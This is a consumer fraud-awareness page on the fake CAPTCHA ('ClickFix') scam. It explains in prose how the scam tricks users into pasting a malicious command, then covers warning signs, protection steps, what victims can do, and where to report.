Established by a former federal investigator · 20+ years DOJ experience · $12.5B lost to fraud in 2024 — FTC
The Fraud CodexScam Intelligence
Live Threats
NewPig butchering via LinkedIn — $2.1M lost, Bay AreaAlertIRS impersonation surge — tax seasonNewFake Coinbase support calls reported nationwide
CRITICAL THREAT

Fake CAPTCHA (ClickFix) Scam

You hit a website, see a routine "Verify you are human" box, and it tells you to press a couple of keys to prove it. Those keystrokes don't prove anything — they paste a hidden command that installs malware you typed in yourself. Security researchers call it ClickFix, and in 2026 it became one of the most common ways attackers break into a device, because you do all the work and your antivirus never sees a file.

Losses: ClickFix attacks surged 517% in H1 2025 (ESET) and became the #2 initial-access vector globally; Microsoft attributed 47% of observed initial compromises to it
Targets: Anyone browsing the web — especially Windows users; increasingly aimed at employees to breach companies
Updated: 2026-06-16
Also known as: ClickFix · Fake CAPTCHA scam · Verify You Are Human scam · ClickFix malware · Fake verification scam · "I am not a robot" scam · Fix It scam
01

How It Works

ClickFix flips the usual malware playbook: instead of tricking you into clicking a bad file, it tricks you into running the malicious command yourself — which is exactly why it slips past antivirus. **The Setup:** 1. **The bait.** You land on a page — often through a poisoned ad, a hacked site, a phishing email, or a high-ranking search result — and see what looks like a normal CAPTCHA: "Verify you are human." Sometimes it's dressed up as a "fix this error" or "your browser needs updating" message. 2. **The "fix."** A prompt says the verification failed and you must complete "a few quick steps." There's usually a button like "Fix It," "How to Fix," or "I'm not a robot." Clicking it silently copies a command onto your clipboard — but installs nothing yet. 3. **You run it.** A pop-up walks you through pressing **Windows + R** (the Run dialog), then **Ctrl + V** to paste, then **Enter**. What you can see in the box reads something harmless like "I am not a robot" — but that's only the tail end of the text. The real command is hidden in front of it. 4. **The payload.** Pressing Enter runs a PowerShell command that quietly downloads and installs malware. From there, attackers can steal your passwords and crypto, drain accounts, watch your screen, or drop ransomware. **Why it works so well:** - **You do the dirty work.** Because you type and run the command yourself, there's no malicious attachment for email filters or antivirus to catch — in its first stage nothing is even written to disk. - **It abuses trusted tools.** It uses built-in Windows utilities (PowerShell, the Run box), so security software sees "normal" activity. - **MFA doesn't save you.** The attack hits your device, not your login, so even phishing-resistant two-factor authentication offers no protection. - **It feels routine.** CAPTCHAs are everywhere, so a fake one doesn't raise alarm — that familiarity is the whole trick. **The scale:** ESET recorded a 517% jump in ClickFix attacks in the first half of 2025, making it the second most common attack vector behind conventional phishing. Microsoft's 2025 Digital Defense Report tied 47% of observed initial compromises to the technique, and Recorded Future assessed it would remain the dominant initial-access method through 2026. In June 2026 both the FTC and Google issued public warnings about it.
How Scammers Make Contact
Compromised & malicious websitesMalvertising (poisoned ads)Phishing emails & calendar invitesFake "software update" pop-upsSearch-result links
02

Warning Signs & Red Flags

  • A "CAPTCHA" or verification box asks you to press keyboard shortcuts (Windows + R, Ctrl + V, Enter) — real CAPTCHAs never do this
  • You are told to open the "Run" box, Terminal, or PowerShell to "verify" or "fix" something
  • Instructions to copy and paste text to prove you are human or to fix an error
  • A "verification failed" or "your browser is outdated" pop-up with a "Fix It" or "How to Fix" button
  • The text you are told to paste is long, even though only the end ("I am not a robot") looks harmless
  • Urgency or step-by-step hand-holding to complete the "fix" quickly
  • The prompt appears after clicking an ad, a search result, or an emailed link
03

Real-World Example

"The page looked like an ordinary CAPTCHA, but instead of clicking pictures it said verification failed and to press Windows + R, paste, and hit Enter to fix it. The text ended in 'I am not a robot' — what victims don't see is the malicious command pasted in front of it, which runs PowerShell and installs the malware the moment they press Enter."

Microsoft Security analysis of the ClickFix technique, 2025
04

How to Protect Yourself

  • Remember the rule: a real CAPTCHA NEVER asks you to press Windows + R, open a terminal, or paste anything
  • If a site tells you to run a command or keyboard shortcut to "verify," close the tab immediately
  • Never paste text into the Windows Run box, PowerShell, or Terminal unless you typed it yourself and know exactly what it does
  • Keep "Run" / clipboard caution in mind — clicking a button can silently copy a command onto your clipboard
  • Use an ad blocker and keep your browser updated to cut down on malvertising lures
  • Enable controlled folder access / reputable endpoint protection and keep Windows updated
  • On a work device, report the page to IT instead of following its instructions
  • Slow down — these attacks rely on familiarity and urgency to keep you from questioning the steps
05

What To Do If You're a Victim

  1. 1Disconnect the device from the internet (Wi-Fi and ethernet) to cut off the attacker
  2. 2Run a full scan with reputable, updated antivirus/anti-malware; consider a professional cleanup or full reinstall for serious infections
  3. 3From a DIFFERENT, clean device, change passwords for email, banking, and crypto — starting with your most important accounts
  4. 4Turn on or reset two-factor authentication on key accounts
  5. 5Contact your bank and any exchanges; watch for unauthorized transactions and freeze cards if needed
  6. 6Check email rules/forwarding and connected apps for anything you did not set up
  7. 7Report to the FBI IC3 at ic3.gov and the FTC at reportfraud.ftc.gov
  8. 8If it happened on a work computer, notify your IT/security team immediately — assume corporate credentials are exposed
Report This Scam
FTC Report Fraud FBI IC3 Identity Theft
?

Frequently Asked Questions

What is Fake CAPTCHA (ClickFix) Scam?

You hit a website, see a routine "Verify you are human" box, and it tells you to press a couple of keys to prove it. Those keystrokes don't prove anything — they paste a hidden command that installs malware you typed in yourself. Security researchers call it ClickFix, and in 2026 it became one of the most common ways attackers break into a device, because you do all the work and your antivirus never sees a file.

What are the warning signs of Fake CAPTCHA (ClickFix) Scam?

A "CAPTCHA" or verification box asks you to press keyboard shortcuts (Windows + R, Ctrl + V, Enter) — real CAPTCHAs never do this. You are told to open the "Run" box, Terminal, or PowerShell to "verify" or "fix" something. Instructions to copy and paste text to prove you are human or to fix an error. A "verification failed" or "your browser is outdated" pop-up with a "Fix It" or "How to Fix" button. The text you are told to paste is long, even though only the end ("I am not a robot") looks harmless.

How do I protect myself from Fake CAPTCHA (ClickFix) Scam?

Remember the rule: a real CAPTCHA NEVER asks you to press Windows + R, open a terminal, or paste anything. If a site tells you to run a command or keyboard shortcut to "verify," close the tab immediately. Never paste text into the Windows Run box, PowerShell, or Terminal unless you typed it yourself and know exactly what it does. Keep "Run" / clipboard caution in mind — clicking a button can silently copy a command onto your clipboard.

What should I do if I'm a victim of Fake CAPTCHA (ClickFix) Scam?

Disconnect the device from the internet (Wi-Fi and ethernet) to cut off the attacker. Run a full scan with reputable, updated antivirus/anti-malware; consider a professional cleanup or full reinstall for serious infections. From a DIFFERENT, clean device, change passwords for email, banking, and crypto — starting with your most important accounts. Turn on or reset two-factor authentication on key accounts.

How serious is this threat?

We rate this critical — among the most damaging schemes we track. Reported losses: ClickFix attacks surged 517% in H1 2025 (ESET) and became the #2 initial-access vector globally; Microsoft attributed 47% of observed initial compromises to it. Most exposed: Anyone browsing the web — especially Windows users; increasingly aimed at employees to breach companies.

Can I get my money back?

Recovery depends on how you paid. Credit card payments may be reversed through chargebacks, while wire transfers and cryptocurrency are rarely recoverable. Report immediately to your bank and file complaints with the FTC at reportfraud.ftc.gov and the FBI IC3 at ic3.gov.

How do I report Fake CAPTCHA (ClickFix) Scam?

Report to the FTC at reportfraud.ftc.gov. For internet crimes, file with the FBI IC3 at ic3.gov. For identity theft, visit identitytheft.gov. You should also contact your local police and your bank.
Sources & References
  1. 01FTC — How to spot a CAPTCHA scam (June 2026)
  2. 02Google — June 2026 frauds and scams advisory
  3. 03Microsoft Security — Analyzing the ClickFix social engineering technique
  4. 04Infosecurity Magazine — ClickFix Attacks Surge 517% in 2025
  5. 05ESET / Help Net Security — ClickFix fake CAPTCHA attacks skyrocketing
Related Scams

Malvertising (Malicious Ads)

The ad above a search result is not vetted by Google for honesty — it is paid placement. Scammers buy the top slot to push phishing pages, fake "support" lines, and malware, often impersonating the very brand you searched for. The first result is sometimes the most dangerous one.

Tech Support Scam

A pop-up, email, or call claims your computer is infected and that Microsoft or Apple needs to fix it — for a fee, and with remote access to your machine. None of it is real. Microsoft and Apple do not cold-call you about viruses, and the only thing that gets compromised is whatever you let them touch.

AI-Enhanced Phishing

Phishing used to give itself away with broken grammar. AI fixed that. The emails are now clean, personalized, and plausible, which means the old "look for typos" advice is dead. Verify any request through a channel you control, not the one that contacted you.

Fake Data Breach Notification

A phishing email impersonates a breach alert — "your data was exposed, reset your password here" — and the link goes to a fake login or "identity protection" page built to capture credentials. The irony is the point: it weaponizes your fear of being hacked. Go to the real site directly, never through the email's link.

Think you've encountered this scam?

Use the free AI scanner to analyze suspicious messages, websites, or phone numbers.

Scan Now — It's Free